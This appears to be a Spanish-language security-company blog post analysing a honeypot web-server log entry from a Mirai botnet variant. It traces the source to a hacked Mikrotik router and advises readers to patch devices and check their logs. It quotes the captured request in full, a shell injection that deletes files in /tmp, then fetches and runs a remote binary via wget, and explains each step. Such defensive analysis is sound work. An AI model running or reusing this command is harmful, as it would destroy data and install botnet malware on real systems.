Insights > Blog

Cuál será la próxima ola de ataques?

Como profesional de seguridad cibernética, tengo mi propio laboratorio con algunos equipos virtuales adquiridos en todo el mundo. El objetivo es simplemente investigar y realizar pruebas para identificar nuevos ataques, soluciones y posibilidades.
Cuando el equipo no se está utilizando, continúa funcionando como “honeypots” (una computadora dejada a propósito para ser atacada), recolectando registros, es decir, intentos de acceso también conocidos como LOG. Nuevamente, el objetivo es la investigación y el análisis futuros.

Este fin de semana, encontré un hecho muy curioso. Al analizar los logotipos de un servidor web, identifiqué la siguiente línea: las direcciones IP se anonimizaron a propósito:

77.xxx.xxx.xxxx – – [27/Jun/2020:22:42:32 +0000] “GET /shell?cd+/tmp;rm+-rf+*;wget+185.yyy.yyy.yyy/bins/UnHAnaAW.x86;chmod+777+/tmp/UnHAnaAW.x86;sh+/tmp/UnHAnaAW.x86+w00dy.jaws HTTP/1.1” 404 488 “-” “Hello, world”

Esta línea tiene la composición probable:

¿Quién?
- Dirección IP de la persona que realiza la conexión:
  - 77.xxx.xxx.xxxx
¿Cuando?
- Fecha y hora:
  - 27/Jun/2020:22:42:32 +0000
¿Qué?
- ¿Qué estabas buscando o accediendo?
  - /shell?cd+/tmp;rm+-rf+*;wget+185.yyy.yyy.yyy/bins/UnHAnaAW.x86;chmod+777+/tmp/UnHAnaAW.x86;sh+/tmp/UnHAnaAW.x86+w00dy.jaws
Respuesta
- Código de respuesta (correcto o incorrecto)
  - 404 == No encontrado
Navegador
- ¿Qué navegador estaba usando para este acceso?
  - Hello, world

¿El qué?” y “Navegador” se destacan en esta línea. Esto se debe a que es inusual encontrar acceso legítimo a las líneas LOG que contienen comandos de Linux. Además, el último campo debe ser la identificación del navegador (Mozilla, Chrome, etc.) pero aparece el texto “Hello world”.

Comprender la función del comando “¿Qué?” si el ataque se hubiera llevado a cabo.

cd+/tmp	Ir al directorio temporal
rm+-rf+*	Borrar todo el contenido de esta ubicación
wget+185.yyy.yyy.yyy/bins/UnHAnaAW.x86	Vaya a 185.yyy.yyy.yyy y descargue los archivos: UnHAnaAW.x86
chmod+777+/tmp/UnHAnaAW.x86	Cambiar los permisos del archivo UnHAnaAW.x86
sh+/tmp/UnHAnaAW.x86+w00dy.jaws	Ejecute el archivo UnHAnaAW.x86 pasando el texto “w00dy.jaws” como parámetro

Figura 1

La descripción “Qué” anterior muestra que el atacante podría ejecutar comandos en las máquinas de las víctimas. Esto significa que podría tener acceso completo al equipo y controlarlo como lo desee.

Analizando la ubicación donde debería haberse realizado la descarga, encontramos un repositorio con archivos binarios para diferentes plataformas o equipos), como se muestra en la siguiente figura:

Figura 2

La afirmación de que esta es una acción maliciosa también proviene de consultar el archivo UnHAnaAW.x86 en el sitio web de Virustotal (www.virustotal.com), que muestra la identificación del archivo como malicioso por 40 programas diferentes de AntiMalware.
Muchos de estos AntiMalwares han categorizado este archivo, como una variación de MIRAI, un malware o botnet que ha estado causando impactos desde 2016. En este caso, después de verificar las figuras 2 y 3, identificamos que el archivo se creó el 9 de junio de 2020. Este mismo archivo se envió a VirusTotal al día siguiente, es decir, el 10 de junio de 2020.
Concluimos, por lo tanto, que este archivo es nuevo y diferente de la versión 2016, y puede contener características más dañinas, pero es parte de la misma familia vista desde 2016.

Figura 3

Al buscar la dirección IP que hizo el acceso, se encontró un enrutador Mikrotik.

Figura 4

Entonces, ¿qué significa todo esto?

El enrutador Mikrotik está pirateado y busca nuevas víctimas para la botnet;
Es difícil y quizás imposible instalar un software antivirus en algunos tipos de equipos;
Hay varias máquinas infectadas en todo el mundo;
No sabemos:
- Cómo se usarán estas máquinas;
- ¿Quiénes serán las víctimas?
- Cuándo ocurrirá el próximo ataque masivo.

Conclusión

En este momento, los dispositivos en su casa pueden ser parte de una red de computadoras que fueron pirateadas previamente y que intentan piratear otros dispositivos.
Esto puede tener un impacto inimaginable y causar pérdidas intangibles a empresas e individuos.
Por lo tanto, vale la pena mencionar la necesidad de actualizar los dispositivos domésticos en general.
Esta investigación fue superficial. Por lo tanto, no se sabe cuántas máquinas existen en esta BotNet. De todos modos, una máquina maliciosa siempre es un gran riesgo.
Durante más de un año, diferentes versiones de este software han estado buscando en Internet nuevas víctimas, y no tenemos forma de predecir cuándo ocurrirá un nuevo ataque masivo.

Si es un usuario habitual de tecnología, actualice todos sus dispositivos. Ayúdanos en esta batalla contra ataques e invasiones de seguridad cibernética.
En el caso de los profesionales de ciberseguridad, revise sus registros para detectar anomalías y mantenga actualizados todos los sistemas y dispositivos, así como su política de seguridad.

Referencias

Análisis detallado de versiones muy similares de este malware, incluidas las indicaciones de compromiso.

https://blog.race-conditions.net/posts/solar-and-solstice-two-mirai-variants/
https://otx.alienvault.com/indicator/file/d15b5dc561a5a1606aeba6baf8be670027a890e7
https://www.virustotal.com/gui/file/e9bd99ec7054bc2e1c343bd02633920ae4ebf745ca69bbe2271bd6dfaa4a89b9/details

Este artículo fue escrito con el objetivo de alertar sobre posibles ataques masivos. En poco tiempo, nuestro objetivo es enseñarle cómo suavizar los registros.

Autor: Fernando Amatte, director de Red Team Services en Cipher Latino America

0 Comments

Submit a Comment Cancel reply

RECIBE NUESTRAS NOTÍCIAS!

Information Security Maturity Self-Assessment Survey

Más información

• Whitepapers
• E-books
• Checklists
• Self-Assessments
• Webcasts
• Infographics

Cookie	Duracíon	Descripción
__hssrc	sesión	Hubspot establece esta cookie cada vez que cambia la cookie de sesión. La cookie __hssrc definida a 1 indica que el usuario ha reiniciado el navegador, y si la cookie no existe, se asume que es una nueva sesión.
cookielawinfo-checkbox-advertisement	1 año	Establecida por el plugin GDPR Cookie Consent, esta cookie se utiliza para registrar el consentimiento del usuario para las cookies de la categoría "Publicidad"
cookielawinfo-checkbox-analytics	1 año	Esta cookie se establece por el plugin GDPR Cookie Consent. Esta cookie se utiliza para registrar el consentimiento del usuario para las cookies de la categoría "Análisis".
cookielawinfo-checkbox-necessary	1 año	Esta cookie se establece por el plugin de consentimiento de cookies de GDPR. Las cookies se utilizan para almacenar el consentimiento del usuario para las cookies en la categoría "Necesario".
cookielawinfo-checkbox-others	1 año	Esta cookie se establece por el plugin de consentimiento de cookies de GDPR. Las cookies se utilizan para almacenar el consentimiento del usuario para las cookies en la categoría "Otros".
viewed_cookie_policy	1 año	Esta cookie se establece por el complemento de consentimiento de cookies de GDPR y se utiliza para almacenar si el usuario ha consentido o no el uso de cookies. No almacena ningún dato personal.

Cookie	Duracíon	Descripción
AnalyticsSyncHistory	1 mes	Sin descripción
cookielawinfo-checkbox-functional	1 año	La cookie se establece mediante el consentimiento de cookies GDPR para registrar el consentimiento del usuario para las cookies en la categoría "Funcional".
li_gc	2 años	No hay descripción
UserMatchHistory	1 mes	Linkedin - Se utiliza para rastrear a los visitantes en múltiples sitios web, con el fin de presentar anuncios relevantes basados en las preferencias del visitante.

Cookie	Duracíon	Descripción
bscookie	2 años	Esta cookie es una cookie de identificación del navegador establecida por Linked share Buttons y etiquetas publicitarias.
IDE	1 año 24 dias	Las cookies de Google DoubleClick IDE se utilizan para almacenar información sobre cómo el usuario utiliza el sitio web para presentarle anuncios relevantes y de acuerdo con el perfil del usuario.
test_cookie	15 minutos	La cookie test_cookie es establecida por doubleclick.net y se utiliza para determinar si el navegador del usuario admite cookies.
VISITOR_INFO1_LIVE	5 meses 27 dias	Una cookie establecida por Youtube para medir el ancho de banda que determina si el usuario recibe la nueva o la antigua interfaz del reproductor.
YSC	sesión	La cookie YSC es establecida por Youtube y se utiliza para rastrear las visualizaciones de los vídeos incrustados en las páginas de Youtube.
yt-remote-connected-devices	nunca expira	YouTube establece esta cookie para almacenar las preferencias de vídeo del usuario que utiliza el vídeo incrustado de YouTube.
yt-remote-device-id	nunca expira	YouTube establece esta cookie para almacenar las preferencias de vídeo del usuario que utiliza el vídeo incrustado de YouTube.

Cookie	Duracíon	Descripción
__hstc	1 año 24 dias	Esta es la principal cookie establecida por Hubspot, para el seguimiento de los visitantes. Contiene el dominio, la marca de tiempo inicial (primera visita), la última marca de tiempo (última visita), la marca de tiempo actual (esta visita) y el número de sesión (se incrementa para cada sesión posterior).
_ga	2 años	La cookie _ga, instalada por Google Analytics, calcula los datos de los visitantes, de la sesión y de la campaña y también hace un seguimiento del uso del sitio para el informe de análisis de este. La cookie almacena la información de forma anónima y asigna un número generado aleatoriamente para reconocer a los visitantes únicos.
_gat_gtag_UA_86671402_1	1 minuto	Esta cookie es instalada por Google y se utiliza para distinguir a los usuarios.
_gcl_au	3 meses	Proporcionada por Google Tag Manager para experimentar la eficacia publicitaria de los sitios web que utilizan sus servicios.
_gid	1 dia	Instalada por Google Analytics, la cookie _gid almacena información sobre el uso que hacen los visitantes de un sitio web, al tiempo que crea un informe analítico del rendimiento del sitio. Algunos de los datos que se recogen son el número de visitantes, su procedencia y las páginas que visitan de forma anónima.
CONSENT	16 años 3 meses 14 dias 14 horas	Estas cookies se instalan a través de vídeos de YouTube incrustados. Registran datos estadísticos anónimos sobre, por ejemplo, el número de veces que se visualiza el vídeo y la configuración utilizada para la reproducción. No se recopilan datos sensibles a menos que inicie sesión en su cuenta de Google, en cuyo caso sus elecciones se vinculan con su cuenta, por ejemplo, si hace clic en "me gusta" en un vídeo.
hubspotutk	1 año 24 dias	Esta cookie es utilizada por HubSpot para hacer un seguimiento de los visitantes del sitio web. Esta cookie se pasa a Hubspot en el envío de formularios y se utiliza cuando se deduplican los contactos.

Cookie	Duracíon	Descripción
__cf_bm	30 minutos	Esta cookie, establecida por Cloudflare, se utiliza para dar soporte a Cloudflare Bot Management.
__hssc	30 minutos	HubSpot establece esta cookie para hacer un seguimiento de las sesiones y para determinar si HubSpot debe incrementar el número de sesión y las marcas de tiempo en la cookie __hstc.
bcookie	2 años	LinkedIn establece esta cookie desde los botones de compartir de LinkedIn y las etiquetas de anuncios para reconocer el ID del navegador.
lang	sesión	Esta cookie se utiliza para almacenar las preferencias de idioma de un usuario para mostrar el contenido en ese idioma almacenado la próxima vez que el usuario visite el sitio web.
lidc	1 dia	LinkedIn establece la cookie lidc para facilitar la selección del centro de datos.

Insights > Blog

Cuál será la próxima ola de ataques?

Comprender la función del comando “¿Qué?” si el ataque se hubiera llevado a cabo.

Conclusión

Referencias

0 Comments

Submit a Comment Cancel reply

RECIBE NUESTRAS NOTÍCIAS!

Information Security Maturity Self-Assessment Survey

Más información

Social Media

LinkedIn

Powered by Juicer

LinkedIn

Social Media

Twitter

Twitter feed is not available at the moment.

Social Media

Facebook

Insights

Whitepaper

Dig into the details of cybersecurity and regulations by reading our exclusive white papers. Each paper is written by an expert at Cipher and full of insight and advice.

Learn more